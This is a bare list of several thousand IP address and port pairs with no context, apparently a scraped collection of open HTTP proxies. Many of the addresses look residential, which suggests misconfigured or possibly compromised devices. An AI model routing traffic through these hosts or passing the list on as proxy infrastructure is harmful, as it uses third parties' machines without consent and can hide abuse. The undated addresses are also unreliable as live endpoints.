183.223.172.230:8123 183.223.192.147:8123 183.223.192.95:8123 183.223.194.27:8123 183.223.194.6:8123 183.223.195.130:8123 183.223.196.184:8123 183.223.197.197:8123 183.223.197.2:8123 183.223.197.249:8123 183.223.197.253:8123 183.223.198.163:8123 183.223.200.61:8123 183.223.201.171:8123 183.223.201.188:8123 183.223.204.13:8123 183.223.204.217:8123 183.223.208.238:8123 183.223.211.34:8123 183.223.215.210:8123 183.223.242.126:8123 183.223.243.55:8123 183.223.33.125:8123 183.223.34.154:8123 183.223.36.35:8123 183.223.40.126:8123 183.223.40.243:8123 183.223.9.11:8123 183.224.1.30:80 183.224.99.148:8123 183.227.216.80:8123 183.227.217.139:8123 183.227.217.19:8123 183.227.219.83:8123 183.228.109.119:8123 183.228.109.23:8123 183.228.109.39:8123 183.228.11.204:8123 183.228.123.214:8123 183.228.139.29:8123 183.228.156.160:8123 183.228.156.6:8123 183.228.177.44:8123 183.228.183.117:8123 183.228.198.184:8123 183.228.201.184:8123 183.228.74.239:8123 183.230.53.45:8123 183.230.53.62:8123 183.230.53.65:8123 183.31.218.177:9999 183.57.78.61:8085 183.60.109.210:8888 183.60.109.23:8888 183.60.109.41:8888 183.60.187.55:80 183.60.44.136:88 183.62.172.50:9999 183.66.79.93:8118 183.69.177.49:80 183.70.34.76:8118 183.82.90.133:9064 183.83.115.161:9064 183.83.176.151:9064 183.83.251.206:9064 183.87.231.166:9064 183.89.72.30:3128 183.89.74.140:3128 183.95.152.141:80 183.95.152.141:8080 183.95.152.141:8091 184.168.134.219:80 185.28.193.95:8080 185.30.147.197:8080 185.37.226.106:19350 185.37.226.184:18080 185.37.226.184:19350 185.72.156.19:7808 186.101.82.74:3128 186.109.91.3:8080 186.138.66.241:8080 186.14.55.28:9064 186.188.123.90:9064 186.188.125.108:9064 186.206.227.138:8080 186.213.197.74:8080 186.214.137.76:8080 186.214.147.241:8080 186.215.80.218:3128 186.215.80.219:3128 186.227.164.142:9064 186.232.160.42:8080 186.244.53.48:8080 186.67.97.35:8081 186.88.1.45:8080 186.88.103.118:8080 186.88.110.3:8080 186.88.164.186:9064 186.88.168.27:9064 186.88.168.38:9064 186.88.170.194:9064 186.88.172.97:8080 186.88.182.129:8080 186.88.210.44:9064 186.88.230.126:8080 186.88.231.104:9064 186.88.231.48:8080 186.88.232.71:8080 186.88.241.240:8080 186.88.244.153:8080 186.88.250.217:9064 186.88.3.105:9064 186.88.33.35:9064 186.88.37.106:8080 186.88.40.252:8080 186.88.42.109:8080 186.88.87.210:9064 186.88.88.200:8080 186.88.92.166:9064 186.88.93.160:9064 186.89.114.171:9064 186.89.114.200:9064 186.89.116.53:8080 186.89.120.15:8080 186.89.125.213:9064 186.89.148.140:8080 186.89.16.157:8080 186.89.16.67:9064 186.89.179.17:8080 186.89.187.155:8080 186.89.190.164:8080 186.89.213.189:9064 186.89.217.106:9064 186.89.220.192:8080 186.89.221.208:9064 186.89.222.230:8080 186.89.23.172:9064 186.89.242.5:8080 186.89.246.243:8080 186.89.255.32:8080 186.89.27.47:8080 186.89.55.37:8080 186.89.85.147:9064 186.89.86.120:9064 186.89.87.57:8080 186.89.98.246:8080 186.9.108.3:9064 186.90.101.243:8080 186.90.108.139:9064 186.90.114.254:8080 186.90.116.128:8080 186.90.121.242:8080 186.90.123.161:9064 186.90.148.78:8080 186.90.155.21:9064 186.90.243.229:8080 186.90.255.249:9064 186.90.28.228:9064 186.90.59.134:9064 186.90.72.49:9064 186.90.82.177:9064 186.90.86.181:9064 186.90.88.98:9064 186.91.126.18:9064 186.91.126.247:8080 186.91.129.223:9064 186.91.134.100:9064 186.91.160.55:9064 186.91.166.69:9064 186.91.199.71:9064 186.91.205.169:9064 186.91.207.83:9064 186.91.226.254:9064 186.91.233.41:8080 186.91.235.205:8080 186.91.238.60:8080 186.91.243.197:9064 186.91.250.8:8080 186.91.251.149:8080 186.91.251.55:8080 186.91.44.228:8080 186.91.63.240:9064 186.91.64.42:8080 186.91.65.22:9064 186.91.70.17:8080 186.91.78.232:8080 186.91.93.7:9064 186.91.94.244:8080 186.92.113.36:9064 186.92.118.8:9064 186.92.128.8:8080 186.92.130.154:9064 186.92.152.23:8080 186.92.163.27:8080 186.92.185.206:8080 186.92.188.130:9064 186.92.190.62:8080 186.92.218.129:8080 186.92.23.113:8080 186.92.24.186:8080 186.92.240.48:8080 186.92.248.120:8080 186.92.25.16:9064 186.92.34.210:8080 186.92.52.50:9064 186.92.53.253:8080 186.92.57.190:8080 186.92.70.9:8080 186.92.82.152:8080 186.92.87.41:9064 186.92.94.140:9064 186.92.94.5:8080 186.93.105.173:8080 186.93.109.17:8080 186.93.111.219:8080 186.93.121.187:8080 186.93.124.133:8080 186.93.129.108:8080 186.93.168.93:8080 186.93.171.28:8080 186.93.172.6:8080 186.93.186.198:8080 186.93.193.70:9064 186.93.195.153:8080 186.93.195.164:8080 186.93.221.111:8080 186.93.231.240:8080 186.93.235.237:9064 186.93.239.159:9064 186.93.249.161:8080 186.93.25.57:8080 186.94.112.178:9064 186.94.117.60:9064 186.94.119.250:9064 186.94.134.72:8080 186.94.148.138:8080 186.94.148.171:8080 186.94.148.217:9064 186.94.163.47:8080 186.94.179.142:8080 186.94.179.72:9064 186.94.186.135:9064 186.94.19.131:9064 186.94.20.132:9064 186.94.219.208:9064 186.94.232.7:9064 186.94.237.186:8080 186.94.24.239:9064 186.94.250.31:9064 186.94.26.73:8080 186.94.30.196:9064 186.94.31.12:9064 186.94.32.212:9064 186.94.36.151:8080 186.94.48.11:9064 186.94.49.218:9064 186.94.54.214:8080 186.94.56.59:9064 186.94.57.101:8080 186.94.65.111:8080 186.94.82.65:8080 186.95.0.113:9064 186.95.108.34:8080 186.95.12.35:9064 186.95.134.251:8080 186.95.137.11:9064 186.95.15.233:9064 186.95.18.191:8080 186.95.183.129:8080 186.95.190.71:8080 186.95.2.225:9064 186.95.210.247:8080 186.95.213.251:8080 186.95.225.10:9064 186.95.230.106:8080 186.95.235.184:8080 186.95.239.215:9064 186.95.243.244:8080 186.95.244.164:9064 186.95.34.212:8080 186.95.47.128:8080 186.95.48.248:9064 186.95.69.202:8080 186.95.82.223:9064 186.95.83.201:8080 186.95.86.21:8080 186.95.87.159:8080 186.95.9.177:9064 187.113.21.188:9064 187.120.34.25:3128 187.122.166.154:9064 187.14.200.174:8080 187.157.45.114:8080 187.16.44.228:8080 187.189.45.128:8080 187.20.209.49:9064 187.36.195.26:9064 187.44.14.156:8080 187.44.158.206:8080 187.45.63.253:8080 187.53.35.105:8080 187.54.122.66:8080 187.57.209.30:9064 187.60.142.156:8080 187.61.215.127:8080 187.63.204.177:9064 187.70.162.193:9064 187.74.160.179:9064 187.74.193.202:9064 187.74.2.62:9064 187.74.92.138:9064 187.75.147.132:3128 187.75.166.80:3130 187.78.24.207:9064 187.86.20.34:8080 187.91.90.242:9064 188.132.226.2:80 188.137.99.6:3128 188.226.145.143:3128 188.40.147.101:2020 189.13.118.92:8080 189.17.66.162:8080 189.201.241.233:8080 189.29.125.192:9064 189.35.43.234:9064 189.39.139.247:9064 189.58.248.110:3128 189.68.124.46:9064 189.69.120.216:9064 189.69.80.63:9064 189.7.98.74:9064 189.73.224.190:8080 189.79.171.201:9064 189.85.29.110:8080 190.0.241.86:80 190.0.241.86:8080 190.104.157.71:3128 190.109.177.229:80 190.12.86.211:3128 190.12.86.213:3128 190.121.148.192:8080 190.121.148.242:8080 190.121.230.148:8080 190.123.187.189:9064 190.136.1.7:8080 190.140.172.164:80 190.142.143.135:9064 190.153.38.152:8080 190.183.48.233:9064 190.198.121.130:8080 190.198.134.191:8080 190.198.139.166:9064 190.198.147.171:8080 190.198.148.134:8080 190.198.150.187:8080 190.198.154.248:8080 190.198.155.226:8080 190.198.16.48:8080 190.198.176.158:9064 190.198.177.232:8080 190.198.181.161:8080 190.198.186.61:8080 190.198.191.164:8080 190.198.22.20:8080 190.198.229.171:8080 190.198.238.142:8080 190.198.246.235:9064 190.198.251.164:8080 190.198.254.72:9064 190.198.29.63:9064 190.198.70.88:9064 190.198.88.131:9064 190.198.93.12:8080 190.198.93.124:8080 190.198.94.215:8080 190.199.195.109:8080 190.199.196.229:9064 190.199.199.185:9064 190.199.217.96:8080 190.199.248.164:8080 190.199.250.219:9064 190.199.41.123:8080 190.199.44.94:9064 190.199.57.66:8080 190.199.59.235:8080 190.199.60.16:8080 190.199.88.195:8080 190.199.91.205:8080 190.199.93.235:9064 190.199.94.215:8080 190.200.134.248:8080 190.200.151.137:9064 190.200.157.182:8080 190.200.208.154:8080 190.200.21.181:9064 190.200.24.38:8080 190.200.25.132:8080 190.200.31.141:8080 190.200.31.224:8080 190.201.100.130:9064 190.201.100.20:8080 190.201.107.108:9064 190.201.107.76:8080 190.201.108.5:9064 190.201.108.80:9064 190.201.121.15:8080 190.201.123.224:8080 190.201.133.72:8080 190.201.140.139:9064 190.201.164.99:8080 190.201.175.103:8080 190.201.219.33:8080 190.201.43.31:9064 190.201.7.17:9064 190.201.96.198:9064 190.201.96.85:9064 190.202.214.247:9064 190.202.216.116:8080 190.202.217.209:8080 190.202.220.214:8080 190.202.241.165:8080 190.203.128.111:9064 190.203.132.125:9064 190.203.141.15:9064 190.203.146.241:8080 190.203.146.7:8080 190.203.147.36:8080 190.203.162.121:9064 190.203.168.12:8080 190.203.176.160:8080 190.203.245.63:9064 190.203.250.90:8080 190.203.251.245:8080 190.203.251.61:9064 190.203.35.198:9064 190.203.74.120:9064 190.203.97.190:9064 190.204.1.103:9064 190.204.100.201:8080 190.204.103.87:8080 190.204.105.25:9064 190.204.112.201:8080 190.204.129.118:8080 190.204.146.154:8080 190.204.169.126:9064 190.204.173.158:8080 190.204.175.211:9064 190.204.18.154:9064 190.204.224.140:9064 190.204.233.103:8080 190.204.39.28:8080 190.204.42.132:9064 190.204.43.206:9064 190.204.47.130:9064 190.204.51.54:9064 190.204.53.22:8080 190.204.6.7:8080 190.204.66.161:9064 190.204.76.167:8080 190.204.84.222:9064 190.204.94.235:9064 190.204.96.197:9064 190.204.98.145:8080 190.205.115.221:8080 190.205.149.164:8080 190.205.157.253:8080 190.205.224.221:8080 190.205.4.140:8080 190.206.10.37:8080 190.206.11.141:9064 190.206.115.196:8080 190.206.12.16:9064 190.206.141.216:8080 190.206.149.119:9064 190.206.150.124:8080 190.206.157.124:9064 190.206.176.92:9064 190.206.212.108:8080 190.206.222.28:8080 190.206.222.79:8080 190.206.223.218:9064 190.206.235.156:9064 190.206.243.148:8080 190.206.252.76:8080 190.206.45.16:9064 190.206.6.139:8080 190.206.62.194:9064 190.206.85.148:8080 190.206.87.25:9064 190.207.106.98:8080 190.207.129.239:8080 190.207.143.22:9064 190.207.154.146:9064 190.207.154.179:8080 190.207.156.22:8080 190.207.159.95:9064 190.207.172.27:8080 190.207.198.135:9064 190.207.199.228:9064 190.207.207.182:8080 190.207.229.227:8080 190.207.233.54:9064 190.207.234.125:8080 190.207.237.182:9064 190.207.32.47:8080 190.207.69.120:9064 190.233.57.239:8080 190.235.148.218:3128 190.235.61.68:3128 190.36.100.254:9064 190.36.16.173:9064 190.36.216.206:9064 190.36.216.52:9064 190.36.217.126:9064 190.36.23.243:8080 190.36.81.209:9064 190.37.0.247:9064 190.37.0.254:9064 190.37.105.70:9064 190.37.110.135:9064 190.37.160.183:8080 190.37.172.185:8080 190.37.208.84:8080 190.37.35.100:9064 190.37.43.4:9064 190.37.68.231:8080 190.37.69.159:9064 190.37.71.168:9064 190.37.76.72:9064 190.37.79.181:8080 190.37.8.203:8080 190.37.87.20:9064 190.38.16.159:9064 190.38.16.62:9064 190.38.166.155:9064 190.38.179.117:9064 190.38.186.233:8080 190.38.190.77:8080 190.38.220.244:9064 190.38.29.136:9064 190.38.29.32:8080 190.38.32.92:9064 190.38.54.243:9064 190.38.92.73:8080 190.39.118.111:9064 190.39.129.133:9064 190.39.137.78:8080 190.39.151.189:9064 190.39.172.212:8080 190.39.201.66:9064 190.39.202.160:9064 190.39.229.133:9064 190.39.243.49:8080 190.39.85.95:8080 190.72.115.225:8080 190.72.142.151:8080 190.72.153.108:9064 190.72.158.70:8080 190.72.182.187:8080 190.72.185.136:9064 190.72.37.136:8080 190.72.4.216:9064 190.72.45.108:9064 190.72.7.56:8080 190.73.104.85:9064 190.73.114.213:9064 190.73.115.193:9064 190.73.127.88:8080 190.73.130.219:9064 190.73.140.153:8080 190.73.143.29:8080 190.73.171.221:9064 190.73.172.251:9064 190.73.224.43:9064 190.73.251.191:8080 190.73.42.70:9064 190.73.44.57:8080 190.73.96.224:9064 190.73.98.196:8080 190.74.116.26:9064 190.74.117.103:9064 190.74.119.189:9064 190.74.195.1:9064 190.74.215.50:8080 190.74.223.165:8080 190.75.111.106:9064 190.75.114.181:9064 190.75.138.95:8080 190.75.237.50:9064 190.75.44.191:9064 190.75.47.3:8080 190.75.62.24:8080 190.75.78.168:9064 190.75.83.81:8080 190.75.86.124:8080 190.77.125.240:8080 190.77.125.66:9064 190.77.147.8:9064 190.77.167.202:9064 190.77.179.224:8080 190.77.181.187:9064 190.77.182.8:8080 190.77.185.70:9064 190.77.187.234:9064 190.77.215.152:9064 190.77.215.250:8080 190.77.221.114:8080 190.77.249.98:8080 190.77.252.118:8080 190.77.252.165:9064 190.77.30.188:9064 190.77.80.136:8080 190.77.80.79:9064 190.77.83.110:9064 190.77.83.144:8080 190.77.83.78:8080 190.78.154.143:9064 190.78.16.155:8080 190.78.161.93:9064 190.78.172.112:8080 190.78.172.31:8080 190.78.175.230:8080 190.78.177.97:9064 190.78.18.7:8080 190.78.183.52:8080 190.78.19.221:8080 190.78.190.56:8080 190.78.21.57:8080 190.78.218.44:9064 190.78.30.48:9064 190.78.51.113:8080 190.78.60.21:9064 190.78.62.131:9064 190.78.63.79:8080 190.78.79.99:9064 190.78.80.91:8080 190.78.81.248:9064 190.78.89.244:9064 190.78.90.189:8080 190.78.91.38:8080 190.78.93.215:8080 190.79.132.253:8080 190.79.153.67:9064 190.79.154.10:8080 190.79.155.196:9064 190.79.156.172:9064 190.79.158.107:8080 190.79.206.126:8080 190.79.21.146:8080 190.79.29.31:9064 190.79.44.179:9064 190.97.234.194:8080 190.97.234.52:8080 191.240.152.241:8080 192.3.91.99:8080 193.30.251.254:8080 194.106.166.1:8080 194.135.220.18:8081 195.113.196.29:80 195.246.54.7:8080 195.88.0.220:8080 197.210.252.44:80 197.210.252.44:8080 198.204.255.10:808 198.50.149.189:8888 198.71.193.136:80 198.71.196.90:80 198.81.200.145:80 198.98.103.160:3128 199.200.120.140:7808 199.200.120.140:8089 200.103.59.24:8080 200.109.131.32:9064 200.109.144.172:8080 200.109.152.249:8080 200.109.177.133:9064 200.109.181.242:9064 200.109.205.174:8080 200.109.206.89:9064 200.109.35.246:8080 200.109.45.69:8080 200.121.140.150:8080 200.214.132.19:3128 200.242.145.3:3128 200.29.67.28:80 200.46.94.202:3128 200.8.119.158:9064 200.8.217.5:9064 200.8.93.22:9064 200.84.100.78:8080 200.84.128.177:8080 200.84.133.140:9064 200.84.141.212:9064 200.84.142.210:9064 200.84.145.113:9064 200.84.149.167:8080 200.84.193.4:8080 200.84.194.29:9064 200.84.246.180:9064 200.84.251.183:9064 200.84.254.30:8080 200.84.37.124:9064 200.84.56.197:9064 200.84.68.94:9064 200.84.70.243:9064 200.84.84.219:9064 200.90.42.206:9064 200.93.109.137:8080 200.93.112.204:8080 200.93.116.106:8080 200.93.119.213:8080 200.93.13.215:8080 200.93.17.119:8080 200.93.17.16:8080 200.93.29.245:8080 200.93.31.207:9064 200.93.81.64:9064 200.99.150.70:8080 201.13.66.196:9064 201.130.171.130:8080 201.14.253.38:8080 201.159.17.228:8080 201.186.209.192:9064 201.188.22.116:9064 201.208.13.164:8080 201.208.133.19:9064 201.208.14.141:8080 201.208.143.23:8080 201.208.161.177:9064 201.208.162.225:9064 201.208.171.99:9064 201.208.178.145:3128 201.208.190.196:9064 201.208.196.109:9064 201.208.232.183:8080 201.208.37.110:9064 201.208.45.1:8080 201.209.102.216:9064 201.209.195.17:9064 201.209.199.156:9064 201.209.200.11:8080 201.209.201.173:9064 201.209.222.238:8080 201.209.232.133:8080 201.209.240.208:9064 201.209.42.1:9064 201.209.43.87:8080 201.209.67.145:9064 201.209.87.60:9064 201.209.89.82:8080 201.209.91.177:8080 201.209.98.204:8080 201.210.153.41:9064 201.210.195.140:8080 201.210.197.10:9064 201.210.206.100:8080 201.210.218.1:9064 201.210.219.243:8080 201.210.245.190:9064 201.210.255.240:8080 201.211.103.175:8080 201.211.108.172:9064 201.211.109.36:8080 201.211.117.183:9064 201.211.122.167:9064 201.211.140.90:9064 201.211.163.180:8080 201.211.192.58:8080 201.211.197.126:8080 201.211.198.238:9064 201.219.22.43:8080 201.222.55.162:8080 201.241.29.250:9064 201.242.113.156:8080 201.242.154.238:9064 201.242.155.233:9064 201.242.18.162:9064 201.242.34.76:8080 201.242.47.172:8080 201.242.78.240:9064 201.242.93.60:8080 201.243.129.66:9064 201.243.131.54:8080 201.243.137.97:9064 201.243.138.214:9064 201.243.168.219:8080 201.243.186.229:8080 201.243.194.141:8080 201.243.212.20:9064 201.243.61.122:9064 201.248.111.38:8080 201.248.237.60:9064 201.249.17.31:8080 201.39.89.51:3128 201.4.9.144:8080 201.56.148.195:3128 201.80.44.156:8080 202.106.16.36:3128 202.106.169.228:8080 202.107.233.85:8080 202.112.128.91:3128 202.118.250.234:8080 202.141.250.173:80 202.145.3.242:8080 202.151.248.22:80 202.153.130.214:80 202.161.89.198:8080 202.169.235.69:8080 202.171.253.74:82 202.171.253.74:83 202.171.253.74:85 202.171.253.84:86 202.177.238.204:9064 202.197.227.228:8088 202.22.195.86:8080 202.29.97.5:3128 202.38.95.66:8080 202.56.231.117:8080 202.62.10.178:8080 202.62.72.139:9064 202.78.233.214:9064 202.99.16.28:3128 203.144.144.162:8080 203.144.144.166:8080 203.169.246.37:3128 203.172.129.4:8080 203.176.182.101:8080 203.176.182.98:8080 203.190.116.235:9064 203.192.12.146:80 203.195.175.15:8080 203.70.253.49:9064 205.129.191.112:80 206.181.83.254:80 207.108.136.68:443 208.83.106.105:9999 209.170.151.142:7808 209.170.151.142:8089 210.14.152.91:80 210.14.152.91:8080 210.14.152.91:88 210.14.152.92:80 210.14.152.92:8080 210.14.152.92:88 210.195.43.136:3128 210.209.79.200:808 210.75.14.158:80 211.144.81.66:18000 211.144.81.66:18001 211.162.0.163:80 212.109.144.117:8080 212.200.153.157:8080 212.56.207.186:3128 212.98.72.13:80 213.141.147.193:8080 216.171.205.9:8080 216.92.112.113:80 217.112.161.16:80 217.117.6.20:8080 218.164.101.27:9064 218.164.143.112:9064 218.164.161.90:9064 218.164.72.60:9064 218.173.173.148:9064 218.201.42.115:80 218.201.42.115:8080 218.203.13.172:80 218.203.13.173:80 218.203.13.174:80 218.203.13.177:80 218.203.13.184:80 218.203.13.185:80 218.203.13.190:80 218.204.96.254:8123 218.205.229.186:3128 218.207.172.236:80 218.207.208.55:8080 218.207.29.77:8123 218.240.131.12:80 218.248.11.19:3128 218.250.124.172:9064 218.4.118.29:8118 218.44.26.122:8080 218.5.74.174:80 218.65.132.38:80 218.65.132.38:8081 218.67.42.27:18186 218.7.132.1:8080 218.76.216.56:63000 218.85.78.89:9999 218.87.111.115:8080 218.90.174.167:3128 219.134.166.18:8118 219.142.251.102:8118 219.143.84.46:9000 219.153.218.234:18186 219.217.227.93:3128 219.238.124.253:8118 219.239.227.32:3128 219.239.236.49:8888 219.246.65.143:3128 219.68.177.84:9064 219.68.55.93:9064 219.70.167.143:9064 219.84.179.66:9064 219.84.234.64:9064 219.85.104.252:9064 219.85.106.152:9064 219.85.248.97:9064 219.91.133.3:9064 219.93.183.106:8080 220.129.168.20:9064 220.129.179.238:9064 220.129.233.245:8088 220.136.12.115:9064 220.137.55.201:9064 220.141.67.102:9064 220.142.93.27:9064 220.143.168.185:9064 220.169.110.89:8080 220.169.18.69:8088 220.172.195.175:8118 220.175.89.102:18186 220.231.32.195:3128 221.10.102.199:83 221.178.30.213:8123 221.182.62.114:9999 221.182.62.115:9999 221.182.74.112:8123 221.183.16.219:80 221.221.13.124:3128 221.223.106.46:3128 221.223.40.146:9000 221.227.104.207:8118 221.238.140.164:8080 221.5.69.51:80 221.5.69.52:8085 221.7.255.173:80 222.124.176.21:8080 222.163.174.130:8585 222.182.176.62:18186 222.217.221.239:8888 222.217.221.240:8888 222.217.221.241:8888 222.219.154.112:8118 222.246.232.55:80 222.246.232.55:8101 222.73.218.43:80 222.87.129.218:80 222.87.129.218:81 222.87.129.218:82 222.87.129.218:83 222.87.129.218:843 222.88.236.236:80 222.88.236.236:82 222.88.236.236:83 222.88.236.236:843 222.94.211.50:8118 223.180.66.197:9064 223.223.134.139:9064 223.223.136.138:9064 223.239.130.15:9064 223.255.160.26:3128 223.27.234.34:8080 223.4.21.184:80 223.64.165.13:8123 223.64.182.121:8123 223.64.53.94:8123 223.66.114.191:8123 223.66.41.19:8123 223.66.73.41:8123 223.66.74.161:8123 223.67.183.80:8123 223.67.201.13:8123 223.67.210.62:8123 223.67.211.78:8123 223.67.219.109:8123 223.67.221.46:8123 223.67.229.97:8123 223.67.239.118:8123 223.67.239.132:8123 223.67.246.163:8123 223.67.246.27:8123 223.67.66.185:8123 223.82.11.159:8123 223.82.164.241:8123 223.82.167.243:8123 223.82.172.241:8123 223.82.172.29:8123 223.82.181.179:8123 223.82.203.154:8123 223.82.203.209:8123 223.82.203.210:8123 223.82.203.61:8123 223.82.204.140:8123 223.82.205.89:8123 223.82.207.89:8123 223.82.217.93:8123 223.82.222.175:8123 223.82.222.92:8123 223.82.223.230:8123 223.82.228.88:8123 223.82.235.187:8123 223.82.242.133:8123 223.82.242.200:8123 223.82.245.168:80 223.82.245.168:81 223.82.47.163:8123 223.82.68.24:8123 223.82.69.249:8123 223.82.74.23:8123 223.82.81.166:8123 223.82.82.243:8123 223.82.82.53:8123 223.82.86.6:8123 223.82.9.31:8123 223.82.91.223:8123 223.82.95.191:8123 223.83.136.163:8123 223.83.140.112:8123 223.83.141.228:8123 223.83.141.243:8123 223.83.142.77:8123 223.83.164.248:8123 223.83.186.157:8123 223.83.189.48:8123 223.83.196.118:8123 223.83.196.225:8123 223.83.196.24:8123 223.83.197.116:8123 223.83.200.106:8123 223.83.201.25:8123 223.83.203.88:8123 223.83.208.162:8123 223.83.209.128:8123 223.83.210.145:8123 223.83.210.26:8123 223.83.212.208:8123 223.83.217.91:8123 223.83.218.130:8123 223.83.218.2:8123 223.83.222.246:8123 223.83.223.24:8123 223.83.232.25:8123 223.83.233.9:8123 223.83.234.254:8123 223.83.236.134:8123 223.83.238.221:8123 223.83.26.170:8123 223.83.34.112:8123 223.83.35.80:8123 223.83.39.111:8123 223.83.39.205:8123 223.83.61.125:8123 223.83.62.112:8123 223.83.63.229:8123 223.83.77.87:8123 223.83.82.238:8123 223.83.83.169:8123 223.83.83.211:8123 223.83.83.48:8123 223.83.85.100:8123 223.83.87.148:8123 223.84.103.180:8123 223.84.106.41:8123 223.84.107.197:8123 223.84.131.82:8123 223.84.131.90:8123 223.84.132.23:8123 223.84.133.219:8123 223.84.134.75:8123 223.84.135.219:8123 223.84.137.154:8123 223.84.139.196:8123 223.84.139.89:8123 223.84.14.197:8123 223.84.140.120:8123 223.84.141.207:8123 223.84.142.188:8123 223.84.143.191:8123 223.84.144.231:8123 223.84.144.36:8123 223.84.144.90:8123 223.84.145.111:8123 223.84.145.132:8123 223.84.147.165:8123 223.84.15.51:8123 223.84.151.163:8123 223.84.155.158:8123 223.84.156.185:8123 223.84.156.192:8123 223.84.156.68:8123 223.84.157.212:8123 223.84.163.23:8123 223.84.163.71:8123 223.84.164.61:8123 223.84.167.116:8123 223.84.167.170:8123 223.84.177.158:8123 223.84.178.45:8123 223.84.179.108:8123 223.84.182.203:8123 223.84.182.42:8123 223.84.186.49:8123 223.84.187.163:8123 223.84.195.4:8123 223.84.2.112:8123 223.84.204.12:8123 223.84.204.185:8123 223.84.207.206:8123 223.84.208.147:8123 223.84.209.63:8123 223.84.21.232:8123 223.84.210.81:8123 223.84.212.214:8123 223.84.219.131:8123 223.84.219.45:8123 223.84.221.55:8123 223.84.23.41:8123 223.84.232.65:8123 223.84.235.152:8123 223.84.235.200:8123 223.84.236.3:8123 223.84.236.69:8123 223.84.237.118:8123 223.84.238.217:8123 223.84.238.73:8123 223.84.24.156:8123 223.84.241.124:8123 223.84.243.205:8123 223.84.251.12:8123 223.84.252.103:8123 223.84.252.46:8123 223.84.254.120:8123 223.84.254.170:8123 223.84.26.28:8123 223.84.27.78:8123 223.84.28.16:8123 223.84.28.162:8123 223.84.28.22:8123 223.84.28.60:8123 223.84.28.97:8123 223.84.32.141:8123 223.84.32.46:8123 223.84.32.75:8123 223.84.4.149:8123 223.84.4.206:8123 223.84.4.231:8123 223.84.46.7:8123 223.84.54.205:8123 223.84.55.38:8123 223.84.6.242:8123 223.84.6.56:8123 223.84.7.45:8123 223.84.7.58:8123 223.84.82.228:8123 223.84.95.37:8123 223.84.95.49:8123 223.85.18.138:8123 223.86.101.173:8123 223.86.116.9:8123 223.86.139.203:8123 223.86.171.18:8123 223.86.210.109:8123 223.86.210.92:8123 223.86.214.63:8123 223.86.65.10:8123 223.86.68.18:8123 223.86.79.42:8123 223.86.9.121:8123 223.87.121.85:8123 223.99.189.102:8090 23.23.204.129:3128 23.252.122.13:3128 23.88.238.46:8081 24.172.34.114:8181 27.105.22.72:9064 27.105.99.77:9064 27.131.47.131:8080 27.147.254.199:9064 27.2.132.121:9064 27.2.207.234:9064 27.3.41.167:9064 27.3.70.56:9064 27.4.247.73:9064 27.49.69.121:9064 27.5.230.20:9064 27.54.168.20:9064 27.56.190.19:9064 27.60.97.112:9064 27.63.123.201:9064 27.8.76.172:8118 31.220.48.202:52743 31.220.49.24:32523 36.224.70.91:9064 36.224.85.206:9064 36.225.215.194:8088 36.225.230.7:9064 36.225.44.232:8088 36.227.153.7:9064 36.227.164.25:9064 36.228.195.92:9064 36.229.198.77:9064 36.229.5.111:9064 36.229.53.69:9064 36.230.53.214:9064 36.230.53.65:9064 36.230.83.125:9064 36.232.196.50:9064 36.234.121.116:9064 36.234.165.50:9064 36.234.213.141:9064 36.234.34.51:9064 36.235.177.171:9064 36.235.228.71:9064 36.235.237.14:9064 36.236.204.55:9064 36.237.57.161:9064 36.239.38.215:9064 36.250.74.87:8103 36.250.74.88:80 36.68.25.230:8080 36.73.2.84:8088 36.78.130.171:8080 36.80.158.174:8088 36.86.249.28:9064 37.187.183.12:3128 37.187.3.128:80 37.187.44.205:80 37.239.46.26:80 37.34.80.223:80 37.57.39.5:8080 37.59.179.220:3128 37.59.248.3:80 41.129.224.245:8080 41.129.90.83:8080 41.188.49.159:8080 41.188.49.164:3128 41.205.14.250:8080 41.222.196.52:8080 41.223.119.156:3128 41.46.192.43:8080 41.46.197.81:8080 41.72.105.38:3128 41.86.25.158:8080 41.89.96.43:3128 42.235.57.54:8585 42.237.92.110:8585 42.249.225.167:8585 46.19.143.253:8888 46.19.231.190:8080 46.24.18.4:8080 46.4.152.218:8080 46.8.23.12:3128 49.158.16.114:9064 49.204.115.34:9064 49.204.162.209:9064 49.205.125.86:9064 49.205.166.210:9064 49.205.218.212:9064 49.205.227.239:9064 49.205.24.198:9064 49.205.77.161:9064 49.205.84.110:9064 49.205.86.55:9064 49.206.12.251:9064 49.206.127.142:9064 49.206.135.142:9064 49.206.181.139:9064 49.207.196.241:9064 49.207.243.52:9064 49.207.249.46:9064 49.207.35.91:9064 49.207.53.171:9064 49.207.67.140:9064 49.207.9.198:9064 5.135.6.168:7808 5.135.6.168:8089 5.152.233.9:8080 5.206.235.28:8080 5.56.61.26:19350 54.169.185.18:8080 54.169.73.201:80 54.174.7.147:3128 54.174.83.182:3128 54.211.2.150:3128 54.223.159.87:3128 54.254.102.180:3128 54.81.39.56:60884 54.81.39.56:64028 54.86.216.36:3128 58.11.3.58:3128 58.115.16.5:9064 58.119.86.221:3128 58.180.17.112:8080 58.213.19.134:2311 58.215.36.102:80 58.215.36.104:80 58.246.199.122:3128 58.251.78.71:8088 58.253.238.242:80 58.253.238.243:80 58.64.158.220:8088 58.96.184.3:3128 59.104.195.66:9064 59.115.147.30:9064 59.115.224.182:9064 59.151.103.15:80 59.161.178.160:9064 59.161.180.134:9064 59.37.126.26:8088 59.38.32.35:1111 59.67.153.132:8118 59.67.83.56:8118 59.75.223.45:8118 59.88.24.35:9064 59.91.135.4:9064 59.92.112.59:9064 59.92.64.24:9064 59.93.135.246:9064 59.93.40.163:9064 59.94.109.90:9064 59.95.231.167:9064 59.95.5.209:9064 60.185.207.157:8585 60.194.67.254:8118 60.206.153.177:8118 60.207.166.152:80 60.217.242.157:80 60.244.55.78:9064 60.26.64.134:8118 61.0.202.77:9064 61.135.137.49:9000 61.158.173.188:9999 61.163.17.158:9999 61.176.62.82:8118 61.184.192.42:80 61.194.40.85:8080 61.223.226.53:9064 61.223.232.144:9064 61.224.211.177:9064 61.224.66.87:9064 61.224.71.210:9064 61.227.126.218:9064 61.227.212.176:9064 61.228.146.145:9064 61.228.151.14:9064 61.228.175.140:8088 61.228.240.57:8088 61.230.183.46:8088 61.230.193.203:9064 61.230.44.216:9064 61.31.171.125:9064 61.51.144.136:8118 61.52.100.107:8118 61.52.21.127:18186 61.52.68.141:8118 61.53.143.179:80 61.58.170.203:9064 61.60.218.5:9064 61.63.122.109:9064 61.90.67.222:8080 61.91.251.4:8080 62.103.107.9:80 62.75.229.121:3128 64.31.22.131:7808 64.31.22.131:8089 65.164.148.66:80 69.10.137.139:8000 69.197.148.18:7808 69.197.148.18:8089 